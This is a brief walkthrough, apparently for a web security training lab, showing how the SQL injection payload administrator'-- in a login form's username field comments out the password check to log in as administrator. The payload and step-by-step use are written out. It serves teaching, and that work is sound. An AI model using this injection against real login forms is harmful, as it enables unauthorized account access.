##### Vulnerability Recap The app builds a query like: ```sql SELECT * FROM users WHERE username = '[input]' AND password = '[input]' ``` If we inject: ```sql administrator'-- ``` It becomes: ```sql SELECT * FROM users WHERE username = 'administrator'--' AND password = '[ignored]' ``` - `'--` starts a SQL comment, ignoring the password check - Only `username = 'administrator'` is evaluated - Password doesn't matter --- ##### Step-by-Step (Browser Only) 1. **Open the lab** in your browser 2. Go to the **Login page** 3. In the **Username field**, enter: ``` administrator'-- ``` 4. In the **Password field**, enter **anything** (e.g., `test`) > It won’t be used – the SQL comment disables it 5. Click **Log in** --- ##### Expected Result - You’re logged in as `administrator` - Lab automatically marks as **Solved** ---